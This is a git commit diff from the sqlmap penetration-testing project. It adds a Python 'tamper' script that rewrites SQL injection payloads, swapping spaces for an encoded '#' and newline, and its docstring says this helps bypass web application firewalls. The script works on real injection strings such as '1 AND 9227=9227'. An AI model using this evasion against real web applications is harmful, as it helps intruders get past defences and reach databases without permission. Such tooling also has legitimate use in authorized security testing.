commiting new tampering scripts contributed by Roberto Salgado

2025-12-07 05:01:30 +00:00 · 2011-11-03 16:04:34 +00:00
parent 61e3621855
commit 5f08b90b6c
4 changed files with 154 additions and 1 deletions
--- a/tamper/space2mssqlhash.py
+++ b/tamper/space2mssqlhash.py
@@ -0,0 +1,47 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+
+__priority__ = PRIORITY.LOW
+
+def tamper(payload):
+    """
+    Replaces space character (' ') with a pound character ('#') followed by
+    a new line ('\n')
+
+    Example:
+        * Input: 1 AND 9227=9227
+        * Output: 1%23%0A9227=9227
+
+    Requirement:
+        * MSSQL
+	* MySQL
+
+    Notes:
+        * Useful to bypass several web application firewalls
+    """
+
+    retVal = ""
+
+    if payload:
+        for i in xrange(len(payload)):
+            if payload[i].isspace():
+                retVal += "%23%0A"
+            elif payload[i] == '#' or payload[i:i+3] == '-- ':
+                retVal += payload[i:]
+                break
+            else:
+                retVal += payload[i]
+
+    return retVal